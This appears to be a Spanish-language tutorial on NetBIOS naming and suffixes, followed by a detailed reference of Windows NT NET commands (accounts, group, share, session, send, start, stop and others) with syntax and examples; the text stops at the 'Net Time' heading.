      NetBIOS es un protocolo utilizado ampliamente para compartir
recursos de una manera simple y eficiente en redes pequeñas.
Proporcionando tanto servicios orientados a conexión (sesiones) como
no orientados a conexión (datagramas).
Es una Interfaz de programación de aplicaciones (o API) que los
programas en una red local pueden utilizar.



1.2- [ Funcionamiento de NetBIOS ]

      Cuando se establece una conexion con un equipo se inicia una sesión,  que
permite mandar mensajes largos y corregir  los  errores  (al  igual  que  el
TCP/IP).

NetBIOS permite comunicaciones orientadas a conexión (de tipo TCP)  o  no
orientadas a conexión y por lo tanto no asegurando que el paquete  llegue  a
su destino (de tipo UDP).



1.3- [ Nombres en NetBios ]
       
      Los nombres de NetBIOS se utilizan para identificar recursos en una red.  
Los equipos utilizan estos nombres para comenzar y para terminar sesiones.  

Los nombres pueden contener hasta 16 caracteres alfanuméricos y la combinación
de caracteres debe ser única dentro de la red. Antes de que una PC con NetBIOS
pueda funcionar correctamente en una red, ella debe registrar su nombre de NetBIOS.
Los pasos para el registro son:  
1.  El cliente envía un mensaje broadcast con su identificación para
asegurarse que otro cliente en la red lo identifique.  
2.  Si otro cliente en la red tiene ese nombre; el cliente de NetBIOS
avisará que el nombre está en uso.  
Así que el cliente que está intentando colocar el nombre; tendrá que elegir otro.  
3.  En cambio; si ningún otro cliente en la red se opone al nombre; el cliente
acabará el registro.  

Hay dos tipos de nombres en NetBIOS: 'Único'(unique) y 'Grupo'(group).
El nombre 'único' no puede repetirse debido a que le pertenece a un solo equipo;
el cual será identificado solo con ese nombre. Es utilizado para el envío de
comunicaciones a la red a un único proceso especifico en un equipo.

El nombre 'grupo' puede repetirse debido a que estos son utilizados para enviar
información a múltiples equipos a un tiempo.

NetBIOS permite 16 caracteres en un nombre de NetBIOS. Microsoft, en cambio;
limita estos nombres a 15 caracteres y utiliza el decimosexto caracter como sufijo
de NetBIOS.  

Ahora; colocaré una tabla extraída de rhino9 con los sufijos de NetBIOS usados
actualmente por WinNT: [Los sufijos se exhiben en formato hexadecimal]

Nombre                 Sufijo Tipo      Servicio
===============================================================

<Nombre_del_equipo>    00    U   Workstation Service
<Nombre_del_equipo>    01    U   Messenger Service
<\\_MSBROWSE_>          01    G   Master Browser
<Nombre_del_equipo>    03    U   Messenger Service
<Nombre_del_equipo>    06    U   RAS Server Service
<Nombre_del_equipo>    1F    U   NetDDE Service
<Nombre_del_equipo>    20    U   File Server Service
<Nombre_del_equipo>    21    U   RAS Client Service
<Nombre_del_equipo>    22    U   Exchange Interchange
<Nombre_del_equipo>    23    U   Exchange Store
<Nombre_del_equipo>    24    U   Exchange Directory
<Nombre_del_equipo>    30    U   Modem Sharing Server Service
<Nombre_del_equipo>    31    U   Modem Sharing Client Service
<Nombre_del_equipo>    43    U   SMS Client Remote Control
<Nombre_del_equipo>    44    U   SMS Admin Remote Control Tool
<Nombre_del_equipo>    45    U   SMS Client Remote Chat
<Nombre_del_equipo>    46    U   SMS Client Remote Transfer
<Nombre_del_equipo>    4C    U   DEC Pathworks TCPIP Service
<Nombre_del_equipo>    52    U   DEC Pathworks TCPIP Service
<Nombre_del_equipo>    87    U   Exchange MTA
<Nombre_del_equipo>    6A    U   Exchange IMC
<Nombre_del_equipo>    BE    U   Network Monitor Agent
<Nombre_del_equipo>    BF    U   Network Monitor Apps
<Nombre_de_usuario>    03    U   Messenger Service
<dominio>             00    G   Domain Name
<dominio>             1B    U   Domain Master Browser
<dominio>             1C    G   Domain Controllers
<dominio>             1D    U    Master Browser
<dominio>              1E    G   Browser Service Elections
<INet~Servicios>      1C    G   Internet Information Server
<IS~Nombre_del_equipo>   00    U   Internet Information Server
<Nombre_de_usuario>    2B    U   Lotus Notes Server
IRISMULTICAST          2F    G   Lotus Notes
IRISNAMESERVER          33    G   Lotus Notes
Forte_$ND800ZA          20    U   DCA Irmalan Gateway Service

En esta tabla podemos ver claramente los nombres de los equipos; el sufijo,
el tipo y el servicio que poseen.

Unique (U): Representa a un equipo. El nombre puede tener solamente una IP
asignada a él.  

Group (G): Representa a un grupo de equipos, por esa razón puede tener más de
una IP asignada a él.

Multihomed (M): El nombre es único, pero  debido a las interfaces múltiples
de la red en el mismo equipo, esta configuración es necesaria para permitir
el registro. El número máximo de direcciones es 25.  

Internet Group (I): Configuración del nombre de grupo usado para manejar nombres
de dominio de WinNT.

Domain Name (D): Nombre del dominio. Versiones de NT 4 o superior.



1.4- [ Comandos ]
       
      A continuación colocaré un listado de todos los comandos NET muy bien
detallados y con ejemplos para que sean más fáciles de entender.

Es recomendable que la mayoría de estos comandos sean bien aprendidos ya que son
necesarios para usar correctamente el NetBios y poder manejarse correctamente
dentro de otros sistemas.

-Nota-
Varios de los comandos de NET poseen algunas propiedades en común como:

- Se puede ver una lista de todos los comandos disponibles si escribe net/?  
- Pueden obtener ayuda sobre la sintaxis en la línea de comandos para un
comando net si escribe net help [comando]. Por ejemplo, si desea ayuda  sobre
el comando net accounts, escriba net help accounts.  
- Todos los comandos net aceptan las opciones /yes y /no (se pueden abreviar
como '/y' y '/n').
-Fin de nota-


Lista de comandos: (Extraído de Tlmat)
------------------

'Net Accounts'

Actualiza la base de datos de cuentas de usuario y modifica los requisitos de
contraseña e inicio de sesión para todas las cuentas.

net accounts [/forcelogoff:{minutos | no}] [/minpwlen:longitud]
[/maxpwage:{días | unlimited}] [/minpwage:días] [/uniquepw:número] [/domain]
         
net accounts [/sync] [/domain]
         

Parámetro                                         Significado
==============================================================================

ninguno                            Presenta en pantalla las configuraciones
                                  actuales de contraseña, limitaciones de
                                  inicio de sesión e información de dominio.

/forcelogoff:{minutos | no}        Establece el número de minutos que
                                  transcurrirán antes de que se dé por
                                  finalizada una sesión de usuario en un
                                  servidor tras el vencimiento de la cuenta
                                  de usuario o el tiempo válido de inicio de
                                  sesión. Con la opción no se impide que se
                                  produzca un cierre de sesión forzado. El
                                  valor predeterminado es 'no'.  
                                  Cuando se especifica la opción
                                  /forcelogoff:minutos, WinNT envía una
                                  advertencia minutos antes de forzar la
                                  salida del usuario de la red.
                                  Si hay algún archivo abierto, WinNT advierte
                                  al usuario. Si minutos es menor que dos,
                                  WinNT indica al usuario que cierre la
                                  sesión de red inmediatamente.

/minpwlen:longitud                 Establece el número mínimo de caracteres para
                                  la contraseña de una cuenta de usuario. Los
                                  valores válidos oscilan entre 0 y 14 caracteres;
                                  el valor predeterminado es de 6 caracteres.

/maxpwage:{días | unlimited}       Establece el número máximo de días de validez de
                                  la contraseña de una cuenta de usuario. El valor
                                  'unlimited' establece un tiempo ilimitado. La
                                  opción /maxpwage debe ser mayor que /minpwage.
                                  Los valores válidos oscilan entre 1 y 49710 días
                                  (unlimited); el valor predeterminado es de 90 días.

/minpwage:días                     Establece el número mínimo de días que han de
                                  transcurrir antes de que un usuario pueda cambiar
                                  una contraseña nueva. Un valor 0 significa que no
                                  hay tiempo mínimo. Los valores válidos oscilan
                                  entre 0 y 49710 días; el valor predeterminado es
                                  de 0 días.

/uniquepw:número                   Impide que el usuario repita la misma contraseña
                                  durante número cambios de contraseña. Los valores
                                  válidos oscilan entre 0 y 8 cambios de contraseña;
                                  el valor predeterminado es de 5 cambios.

/domain                            Realiza la operación sobre el controlador principal
                                  del dominio actual. Si no se especifica este
                                  parámetro, la operación se realizará en el equipo
                                  local. (Este parámetro se aplica únicamente a equipos
                                  con Windows NT Workstation que son miembros de un
                                  dominio de WinNT Server. De manera predeterminada,
                                  los equipos con WinNT Server realizan las
                                  operaciones sobre el controlador principal del dominio).

/sync                              Cuando se utiliza en el controlador principal de dominio,
                                  causa la sincronización de todos los controladores de
                                  reserva de dicho dominio. Cuando se utiliza en un
                                  controlador de reserva, causa la sincronización de
                                  ese controlador de reserva con el controlador
                                  principal de dominio únicamente. Este comando sólo se
                                  aplica a los equipos que son miembros de un dominio
                                  de WinNT Server.

Ejemplos:
---------

- Para mostrar la configuración actual para el cierre forzado     net accounts
 de sesión, los requisitos de contraseña y la función de un
 servidor determinado

- Para establecer un mínimo de siete caracteres para las          net accounts /minpwlen:7
 contraseñas de la cuenta de usuario

- Para especificar que una contraseña no pueda repetirse          net accounts /uniquepw:5
 hasta pasados cinco cambios

- Para evitar que los usuarios cambien la contraseña con una      net accounts /minpwage:7
 frecuencia mayor que cada 7 días, para forzar el cambio         /maxpwage:30 /forcelogoff:5
 de contraseña cada 30 días y para forzar el cierre de sesión
 tras el vencimiento del tiempo de inicio de sesión y emitir
 una advertencia 5 minutos antes del cierre forzado

- Para realizar la tarea anterior en un equipo con Windows        net accounts /minpwage:7
 NT Workstation y asegurarse de que la configuración es          /maxpwage:30 /domain
 efectiva en el dominio de Windows NT Server en el que el
 equipo ha iniciado la sesión

- Para actualizar la base de datos de cuentas de usuario de        net accounts /sync
 todos los servidores miembros

---

'Net Computer'

Agrega o elimina equipos de una base de datos de dominios. Este comando está
disponible sólo en los equipos con Windows NT Server.

net computer \\equipo {/add | /del}
         
Parámetro                                     Significado
=============================================================================

\\equipo                        Especifica el equipo que se agrega o elimina
                               del dominio.

/add                            Agrega el equipo especificado al dominio.

/del                            Quita el equipo especificado del dominio.


Ejemplo:
--------

- Para agregar el equipo ARCOIRIS al dominio              net computer \\arcoiris /add

---

'Net Config'

Muestra los servicios configurables que están en ejecución, o muestra y modifica la
configuración de un servicio.

net config [servicio [opciones]]
         
Parámetro                                    Significado
===============================================================================

ninguno                 Escriba net config sin parámetros para ver una lista
                       de los servicios configurables.

Servicio                Es un servicio (server o workstation) que puede
                       configurarse con el comando net config.

Opciones                Son específicas del servicio. Vea net config server o
                       net config workstation para obtener la sintaxis completa.


Use el comando net config servicio para cambiar parámetros configurables de servicio
Servidor o Estación de trabajo. Los cambios entran en vigor inmediatamente y son
permanentes.

---

'Net Config Server'

Muestra o cambia la configuración para el servicio Servidor mientras dicho servicio
está en ejecución.

net config server [/autodisconnect:tiempo] [/srvcomment:"texto "] [/hidden:{yes | no}]

Parámetro                                      Significado
===============================================================================

ninguno                             Visualiza la configuración actual del
                                   servicio Servidor.

/autodisconnect:tiempo              Establece el número máximo de minutos que
                                   una sesión de usuario puede permanecer
                                   inactiva antes de que se desconecte. Puede
                                   especificar -1 para que nunca se produzca
                                   dicha desconexión. Los valores válidos
                                   oscilan entre -1 y 65535 minutos; el valor
                                   predeterminado es 15.

/srvcomment:"texto"                 Agrega un comentario para el servidor que
                                   se muestra en las pantallas de WinNT y con
                                   el comando net view. El comentario puede
                                   tener un máximo de 48 caracteres. Escriba
                                   el texto entre comillas.

/hidden:{yes | no}                  Especifica si el nombre de equipo del
                                   servidor debe aparecer al presentar
                                   la lista de servidores. Tenga en cuenta que
                                   el hecho de ocultar un servidor
                                   no modifica los permisos definidos en él.
                                   El valor predeterminado es 'no'.

Ejemplos:
---------

- Para mostrar información acerca del                net config server | more
 servidor local e impedir que la pantalla se
 desplace

- Para ocultar el nombre de equipo del           net config server /hidden:yes
 servidor en la lista de servidores
 disponibles

- Para desconectar a un usuario después de  net config server /autodisconnect:15
 15 minutos de inactividad
                 
---

'Net Config Workstation'

Muestra o cambia la configuración del servicio Estación de trabajo mientras
está en ejecución.

net config workstation [/charcount:bytes] [/chartime:ms] [/charwait:s]
         

Parámetro                                  Significado
================================================================================

Ninguno                    Escriba net config workstation para mostrar la
                          configuración actual del equipo local.

/charcount:bytes           Especifica la cantidad de datos que recopila WinNT
                          antes de enviarlos a un dispositivo de comunicaciones.
                          Si se establece también /chartime:ms, WinNT actúa
                          según la condición que se satisfaga primero.
                          Los valores válidos oscilan entre 0 y 65.535 bytes;
                          el valor predeterminado es de 16 bytes.

/chartime:ms               Establece el número de milisegundos durante los cuales
                          WinNT recopila datos antes de enviarlos a un
                          dispositivo de comunicaciones. Si se establece también
                          /charcount:bytes, WinNT actúa según la condición que
                          se satisfaga primero. Los valores válidos oscilan
                          entre 0 y 65.535.000 milisegundos; el valor
                          predeterminado es de 250 milisegundos.

/charwait:seg              Establece el número de segundos que esperará WinNT a
                          que un dispositivo de comunicaciones esté disponible.
                          Los valores válidos oscilan entre 0 y 65.535
                          segundos; el valor predeterminado es de 3.600 segundos.


Ejemplos:
---------

- Para presentar en pantalla la configuración actual       net config workstation
 del servicio Estación de trabajo

- Para establecer el número de milisegundos que            net config workstation
 WinNT espera antes de enviar los datos a                 /chartime:500
 un dispositivo de comunicación a 500
 milisegundos
 
---      

'Net Continue'

Vuelve a activar un servicio interrumpido.

net continue servicio
         
Parámetro                               Significado
===============================================================================

Servicio           Los servicios que pueden reanudarse son los siguientes:
                  servidor de archivos para macintosh (sólo para WinNT Server),
                  servicio de publicación de FTP, lpdsvc, inicio
                  de sesión de red, dde de red, dsdm dde de red, proveedor de
                  seguridad nt lm, inicio remoto(sólo para WinNT Server),
                  servidor de acceso remoto, schedule, servidor, servicios
                  simples de tcp/ip y estación de trabajo.

---

'Net File'

Muestra los nombres de todos los archivos compartidos abiertos en un servidor y el
número de bloqueos de archivo (si existe alguno) en cada uno de ellos. Este comando
también cierra archivos compartidos individuales y quita bloqueos de archivo.

net file [id [/close]]
           
Parámetro                               Significado
================================================================================

ninguno             Escriba net file sin parámetros para obtener una lista de
                   los archivos abiertos en un servidor.

Id                  Es el número de identificación del archivo.

/close              Cierra un archivo abierto y libera los registros bloqueados.
                   Escriba este comando desde el servidor en el que se comparte
                   el archivo.

Ejemplos:
---------

- Para ver una pantalla de información acerca de los archivos        net file
 compartidos

- Para cerrar un archivo con el número de identificación 1     net file 1 /close
     

La pantalla que muestra el comando net file es similar a la siguiente:

Archivo    Ruta de acceso    Nombre de usuario   Bloqueos
=========================================================
0         C:\ARCH_A.TXT         MARISAF            0
1         C:\BASEDATOS          DAVIDSA            2


---

'Net Group'

Agrega, muestra o modifica grupos globales en dominios de Windows NT Server. Este
comando sólo está disponible en los dominios de Windows NT Server.

net group [nombre_grupo [/comment:"texto"]] [/domain]
           
net group nombre_grupo {/add [/comment:"texto"] | /delete} [/domain]
           
net group nombre_grupo nombre_usuario[...] {/add | /delete} [/domain]

       
Parámetro                                   Significado
=============================================================================

ninguno                    Escriba net group sin parámetros para mostrar el
                          nombre de un servidor y los nombres de los grupos
                          de dicho servidor.

nombre_grupo               Es el nombre del grupo que va a agregarse,
                          expandirse o eliminarse. Especifique un nombre de
                          grupo para ver la lista de los usuarios
                          correspondientes.

/comment:"texto"           Agrega un comentario para un grupo nuevo o existente.
                          Dicho comentario puede tener hasta 48 caracteres.
                          Escriba el texto entre comillas.

/domain                    Realiza la operación sobre el controlador principal
                          del dominio actual. Si no se especifica este
                          parámetro, la operación se realizará en el equipo
                          local. Este parámetro se aplica únicamente a
                          equipos con WinNT Workstation que son miembros de
                          un dominio de WinNT Server. De manera
                          predeterminada, los equipos con WinNT Server
                          realizan las operaciones en el controlador
                          principal del dominio.  

nombre_usuario[...]        Muestra la lista de uno o más usuarios que se
                          agregarán o quitarán de un grupo.
                          Separe los nombres de usuario con un espacio
                          en blanco.

/add                       Agrega un grupo o un nombre de usuario a un grupo.
                          Debe establecerse una cuenta para los usuarios
                          agregados a un grupo con este comando.

/delete                    Quita un grupo o un nombre de usuario de un grupo.


Ejemplos:
---------

- Para ver una lista de todos los grupos en el servidor local       net group

- Para agregar un grupo llamado ejec a la base de datos local   net group ejec /add
 de cuentas de usuario

- Para agregar un grupo llamado ejec a la base de datos de  'net group ejec /add /domain'
 cuentas de usuario de un dominio de Windows NT Server
 desde un equipo con el software Windows NT Workstation
 instalado

- Para agregar las cuentas de usuario ya existentes esterv,  net group ejec esterv rafar
 rafar y jesust al grupo ejec en el equipo local            jesust /add

- Para agregar las cuentas de usuario ya existentes esterv,  net group ejec esterv rafar
 rafar y jesust al grupo ejec de un dominio de Windows NT     jesust /add /domain
 Server desde un equipo con el software Windows NT
 Workstation instalado

- Para mostrar los usuarios del grupo ejec                     net group ejec

- Para agregar un comentario al registro del grupo ejec        net group ejec
                                                         /comment:"Plantilla de ejecutivos"
         

La pantalla que muestra los grupos del servidor es similar a la siguiente:

Cuentas de grupo de \\PRODUCCIÓN
=======================================================
*Admins. del dominio *Usuarios del dominio

Observe que los nombres de grupos van precedidos por un asterisco (*), que sirve
para identificar los grupos que incluyen usuarios y grupos.

---

'Net Help'

Proporciona una lista de comandos de red y temas sobre los que puede obtener
ayuda, o proporciona ayuda acerca de un comando o tema específico. Los comandos
de red disponibles también se muestran en la ventana Comandos de esta Referencia
de comandos, bajo la letra N.

net help [comando]
           
net comando {/help | /?}
           

Parámetro                               Significado
=========================================================================

ninguno              Escriba net help sin parámetros para mostrar una
                    lista de comandos y temas acerca de los cuales puede
                    obtenerse ayuda.

comando              Es el comando acerca del cual desea obtener ayuda.
                    No escriba net como parte del comando.

/help                Proporciona una forma alternativa de mostrar en
                    pantalla el texto de ayuda.

/?                   Muestra la sintaxis correcta del comando.


Ejemplos:
---------

- Para obtener la misma información acerca del comando      net help use
 net use, utilizando dos formas del comando net help         o bien
                                                           net use /help

- Para ver la sintaxis del comando net use              net use /?

---

'Net Helpmsg'

Proporciona ayuda referente a un mensaje de error de Windows NT.

net helpmsg mensaje_nº

Parámetro                                   Significado
=======================================================================

mensaje_nº          Es el número de cuatro dígitos del mensaje de WinNT
                   acerca del cual necesita ayuda.
       

---

'Net Localgroup'

Agrega, muestra o modifica grupos locales.

net localgroup [nombre_grupo [/comment:"texto"]] [/domain]
         
net localgroup nombre_grupo {/add [/comment:"texto"] | /delete} [/domain]
         
net localgroup nombre_grupo nombre [...] {/add | /delete} [/domain]


Parámetro                                Significado
=======================================================================

Ninguno                   Escriba net localgroup sin parámetros para
                         mostrar el nombre del servidor y los
                         nombres de los grupos locales de dicho equipo.

Nombre_grupo              Es el nombre del grupo que va a agregarse,
                         expandirse o eliminarse. Proporcione
                         sólo un nombre_grupo para ver una lista de
                         los usuarios o grupos globales de un
                         grupo local.

/comment:"texto"          Agrega un comentario para un grupo nuevo o
                         existente. El comentario puede tener
                         hasta 48 caracteres de longitud. Escriba el
                         texto deseado entre comillas.  

/domain                   Realiza la operación en el controlador principal
                         del dominio actual. Si no se especifica este
                         parámetro, la operación se realizará en el
                         equipo local. Este parámetro se aplica únicamente
                         a equipos con Windows NT Workstation que son
                         miembros de un dominio de Windows NT Server. Si
                         no se indica lo contrario, los equipos con
                         WinNT Server realizarán las operaciones en
                         el controlador principal del dominio.  

Nombre [...]              Muestra la lista de uno o más nombres de usuario o
                         de grupo que se agregarán a un grupo local o se
                         quitarán de él. Separe cada nombre con un espacio en
                         blanco. Los nombres pueden ser usuarios locales,
                         usuarios de otros dominios o grupos globales,
                         pero no otros grupos locales. Si un usuario es
                         de otro dominio, escriba el nombre de usuario
                         después del nombre de dominio
                         (por ejemplo, VENTAS\SAMUEL).

/add                      Agrega un nombre de grupo o de usuario a un grupo
                         local. Debe establecerse una cuenta para los usuarios
                         o grupos globales que se agreguen a un grupo local con
                         este comando.
/delete                   Quita un nombre de grupo o de usuario de un grupo local.

Use el comando net localgroup para agrupar usuarios que utilizan de un modo igual o
similar el equipo o la red. Cuando se asignen derechos a un grupo local, cada miembro
de dicho grupo recibirá automáticamente estos derechos.


Ejemplos:
---------

- Para mostrar una lista de todos los grupos locales del             net localgroup
 servidor local

- Para agregar un grupo local llamado ejec a la base de       net localgroup ejec /add
 datos local de cuentas de usuario

- Para agregar un grupo local llamado ejec a la base de  net localgroup ejec /add /domain
 datos de cuentas de usuario de un dominio de
 WinNT Server

- Para agregar las cuentas de usuario ya existentes           net localgroup ejec esterv
 esterv, rafar (del dominio VENTAS) y jesust al grupo         ventas\rafar jesust /add
 local ejec en el equipo local

- Para agregar las cuentas de usuario ya existentes       net localgroup ejec esterv rafar
 esterv, rafar y jesust al grupo ejec de un dominio de             jesust /add /domain
 WinNT Server

- Para mostrar los usuarios del grupo local ejec              net localgroup ejec

- Para agregar un comentario al registro del grupo local       net localgroup ejec
 ejec                                                  /comment:"Plantilla de ejecutivos"


---

'Net Name'

Agrega o elimina un nombre para mensajes (a veces llamado alias), o muestra la lista de
nombres para los que el equipo aceptará mensajes. Para poder usar net name, el servicio
de Mensajería debe estar en ejecución.

net name [nombre [/add | /delete]]

Parámetro                                     Significado
=========================================================================

ninguno           Escriba net name sin parámetros para mostrar una lista
                 de los nombres actualmente en uso.

nombre            Especifica el nombre que recibe mensajes. Dicho nombre
                 puede tener un máximo de 15 caracteres.

/add              Agrega un nombre a un equipo. Escribir /add es opcional
                 puesto que el resultado de escribir net name nombre es
                 el mismo que el de escribir net name nombre /add.

/delete           Quita un nombre de un equipo.


Ejemplos:
---------

- Para ver la lista de nombres en su equipo                    net name

- Para agregar el nombre rsvp a su equipo                 net name rsvp

- Para quitar el nombre rsvp de su equipo         net name rsvp /delete
   

---

'Net Pause'

Interrumpe los servicios en ejecución.

net pause servicio


Parámetro                                 Significado
===================================================================

servicio     Puede ser:
                      Servidor de archivos para Macintosh  
                      Servicio de publicación de FTP  
                      LPDSVC  
                      Inicio de sesión de red  
                      DDE de red  
                      DSDM DDE de red  
                      Proveedor de seguridad Lan Manager de NT  
                      Inicio remoto (sólo en Windows NT Server)  
                      Servidor de acceso remoto  
                      Schedule  
                      Servidor  
                      Servicios simples de tcp/ip  
                      Estación de trabajo.  
                 

Ejemplos:
---------

- Para interrumpir el servicio Servidor                 net pause server

- Para interrumpir el servicio Inicio de sesión de red  net pause "net logon"
 

---

'Net Print'

Muestra o controla los trabajos y las colas de impresión.

net print \\nombre_equipo\recurso_compartido
           
net print [\\nombre_equipo] trabajo_nº [/hold | /release | /delete]


Parámetro                              Significado
================================================================

Nombre_equipo         Es el nombre del equipo que comparte las
                     colas de impresión.

Recurso_compartido    Es el nombre de la cola de impresión.
                     Cuando incluya recurso_compartido y
                     nombre_equipo, sepárelos con una barra
                     invertida (\).

Trabajo_nº            Es el número de identificación asignado a un
                     trabajo de impresión en una cola.
                     
/hold                 Cuando se usa con trabajo_nº, retiene el
                     trabajo en espera en la cola de impresión.
                     El trabajo permanece en la cola y los demás
                     trabajos lo rebasarán hasta que se libere.

/release              Libera un trabajo o una cola de impresión
                     que se ha retenida.  

/delete               Quita un trabajo de la cola de impresión.


Ejemplos:
---------

- Para obtener información acerca del trabajo número   net print \\producción 35
 35 del equipo \\PRODUCCIÓN

- Para retener el trabajo número 263 del equipo     net print \\producción 263 /hold
 \\PRODUCCIÓN
   

- Para liberar el trabajo número 263 del equipo    net print \\producción 263 /release
 \\PRODUCCIÓN

- Para obtener una lista del contenido de la cola de    net print \\producción\matriz
 impresión MATRIZ del equipo \\PRODUCCIÓN
   

Lo siguiente es un ejemplo de la información presentada de todas las colas de impresión:

Colas de impresora en \\PRODUCCIÓN

Nombre       Trabajo No.    Tamaño         Estado
====================================================

Cola LÁSER   1 trabajos                *Cola activa*
            1 trabajos       0          en cola
 
Use net print trabajo_nº para mostrar un único trabajo de impresión. Aparecerá una
pantalla similar a la siguiente:

Trabajo No.               35
Estado                    Esperando
Tamaño                    3096
Comentario                  
Usuario                   MARIASL
Notificar                 MARIASL
Tipo de dato del trabajo                        
Parámetros del trabajo                      
Información adicional
                     

---

'Net Send'

Envía mensajes a otros usuarios, equipos, grupos o nombres para mensajes en la
red. El servicio Mensajería debe estar en ejecución para poder recibir mensajes.

net send {nombre | * | /domain[:nombre] | /users} mensaje


Parámetro                                   Significado
=========================================================================

nombre            Es el nombre de usuario, de equipo o nombre para mensajes
                 al que se envía el mensaje. Si se trata de un nombre de
                 equipo que contiene caracteres en blanco, escríbalo entre
                 comillas (" ").

*                 Envía el mensaje a todos los nombres del grupo.

/domain[:nombre]  Envía el mensaje a todos los nombres del dominio del equipo.
                 Si se especifica nombre, se enviará el mensaje a todos los
                 nombres del dominio o grupo de trabajo especificado.

/users            Envía el mensaje a todos los usuarios conectados al servidor.

mensaje           Es el texto que se enviará como mensaje.


Ejemplos:
---------

- Para enviar el mensaje "Reunión cambiada      net send robertof Reunión cambiada a
 a las 15 horas. En el mismo lugar." al        las 15 horas. En el mismo lugar.
 usuario robertof, escriba:

- Para enviar un mensaje a todos los usuarios  net send /users Este servidor se apagará
 conectados al servidor, escriba:                          en 5 minutos.

- Para enviar un mensaje que incluya una       net send robertof "Formatear tu disco
 barra diagonal, escriba:                                con FORMAT /4"
       

---

'Net Session'

Muestra la lista o desconecta las sesiones entre un equipo local y los clientes
conectados a él.

net session [\\nombre_equipo] [/delete]


Parámetro                                       Significado
=============================================================================

Ninguno              Escriba net session sin parámetros para que se muestre
                    información acerca de todas las sesiones con el equipo
                    local.

\\nombre_equipo      Identifica el equipo para el cual se mostrarán o
                    desconectarán sesiones.

/delete              Finaliza la sesión del equipo con \\nombre_equipo y
                    cierra todos los archivos abiertos en el equipo para la
                    sesión. Si se omite \\nombre_equipo, se cancelarán
                    todas las sesiones del equipo local.

Ejemplos:
---------

- Para mostrar una lista con información sobre las sesiones del    net session
 servidor local

- Para mostrar información sobre las sesiones del cliente cuyo  net session \\sánchez
 nombre de equipo es SÁNCHEZ

- Para finalizar todas las sesiones entre el servidor y los clientes  net session /delete
 conectados
   
La pantalla es similar a la siguiente:  

Equipo       Usuario      Tipo de cliente   Abiertos   Inactiva
================================================================
\\BASSETT   CRISDR           NT                1      00:00:13
\\SANZCA   Administrador     DOS LM 2.1        0      01:05:13

         
---

'Net Share'

Crea, elimina o muestra recursos compartidos.

net share recurso_compartido
           
net share recurso_compartido=unidad:ruta_de_acceso [/users:número | /unlimited]
[/remark:"texto"]
           
net share recurso_compartido [/users:número | unlimited] [/remark:"texto"]
           
net share {recurso_compartido | unidad:ruta_de_acceso} /delete

Parámetro                                   Significado
=============================================================================

Ninguno                Escriba net share sin parámetros para mostrar
                      información acerca de todos los recursos compartidos
                      en el equipo local.

recurso_compartido     Es el nombre de red del recurso compartido. Escriba
                      'net share' con un recurso_compartido únicamente para
                      mostrar información acerca de dicho recurso compartido.

unidad:ruta_de_acceso  Especifica la ruta de acceso absoluta del directorio que
                      va a compartirse.

/users:número          Establece el número máximo de usuarios que pueden tener
                      acceso simultáneamente al recurso compartido.

/unlimited             Especifica que puede tener acceso simultáneamente al
                      recurso compartido un número ilimitado de usuarios.

/remark:"texto"        Agrega un comentario descriptivo acerca del recurso.
                      Escriba el texto entre comillas.

/delete                Deja de compartir un recurso.


Ejemplos:
---------

- Para mostrar información acerca de los recursos           net share
 compartidos en el equipo

- Para compartir el directorio C:\CARTAS de un equipo   net share secretaria=c:\cartas
 con el nombre compartido SECRETARIA e incluir un     /remark:"Para el departamento 123"  
 comentario  

- Para dejar de compartir el directorio CARTAS      net share secretaria /delete

- Para compartir el directorio C:\LST FIG de un equipo con   net share lista="c:\lst fig"
 el nombre compartido LISTA
   

La presentación en pantalla es similar a la siguiente:

Nombre                Recurso          Comentario
=========================================================
ADMIN$     C:\WINNT                   Admin Remota
C$         C:\                        Uso interno
print$     C:\WINNT\SYSTEM\SPOOL
IPC$       IPC remota
LÁSER      LPT1 En cola               Impresora Láser


---

'Net Start'

Inicia un servicio o muestra una lista de los servicios iniciados. Los nombres
de servicios que son de dos o más palabras, como Inicio de sesión de red o Examinador
de equipos, deben estar entre comillas (").

net start [servicio]


Parámetro                 Significado
================================================================

ninguno   Escriba net start sin parámetros para mostrar una
         lista de los servicios en ejecución.

servicio  Puede ser:
                   Alerta  
                   Servicio de cliente para netware  
                   Servidor del Portafolio  
                   Examinador de equipos  
                   Cliente dhcp  
                   Duplicador de directorios  
                   Registro de sucesos  
                   Servicio de publicación de FTP  
                   LPDSVC  
                   Mensajería  
                   Inicio de sesión de red  
                   DDE de red  
                   DSDM DDE de red  
                   Agente de supervisión de red  
                   Proveedor de seguridad nt lm  
                   OLE  
                   Administrador de conexiones de acceso remoto  
                   Servicio isnsap de acceso remoto  
                   Servidor de acceso remoto  
                   Localizador de llamada a procedimientos remotos (rpc)  
                   Servicio de llamada a procedimientos remotos (rpc)  
                   Schedule  
                   Servidor  
                   Servicios simples de tcp/ip  
                   SNMP  
                   Spooler  
                   Ayuda de netbios de tcp/ip  
                   SAI  
                   Estación de trabajo  
                 

Los siguientes servicios sólo están disponibles en Windows NT Server:  

- Servidor de archivos para Macintosh  
- Servicio de puerta de enlace o gateway para netware  
- Servidor de DHCP de Microsoft  
- Servidor de impresión para Macintosh  
- Inicio remoto  
- Servicio de nombres Internet de Windows  

   
---

'Net Statistics'

Muestra el registro de estadísticas del servicio local Estación de trabajo o
Servidor.

net statistics [workstation | server]

Parámetro                                     Significado
=======================================================================

ninguno         Escriba net statistics sin parámetros para obtener una
               lista de los servicios en ejecución para los cuales hay
               datos estadísticos disponibles.

workstation     Muestra los datos estadísticos del servicio local
               Estación de trabajo.

Server          Muestra los datos estadísticos del servicio local
               Servidor.


Ejemplos:
---------

- Para mostrar los servicios en ejecución para los que hay         net stats
 estadísticas disponibles
   
- Para mostrar las estadísticas del servicio Servidor  net statistics server | more
 y evitar que se desplace la pantalla

       
---

'Net Stop'

Detiene un servicio de Windows NT.

net stop servicio

Parámetro                                Significado
========================================================================

servicio  Puede ser:
                   alerta
                   servicio de cliente para netware
                   servidor del Portafolio
                   examinador de equipos
                   duplicador de directorios
                   servicio de publicación de FTP
                   lpdsvc
                   mensajería
                   inicio de sesión de red
                   dde de red
                   dsdm dde de red
                   agente de supervisión de red
                   proveedor de seguridad nt lm
                   ole
                   administrador de conexiones de acceso remoto
                   servicio isnsap de acceso remoto
                   servidor de acceso remoto
                   localizador de llamada a procedimientos remotos (rpc)
                   schedule
                   servidor
                   servicios simples de tcp/ip
                   snmp
                   spooler
                   ayuda de netbios de tcp/ip
                   sai y estación de trabajo

                   WinNT Server:
                                servidor de archivos para macintosh
                                servicio gateway para netware
                                servidor dhcp de microsoft
                                servidor de impresión para macintosh
                                servicio de nombres internet de windows
   
---

'Net Time'

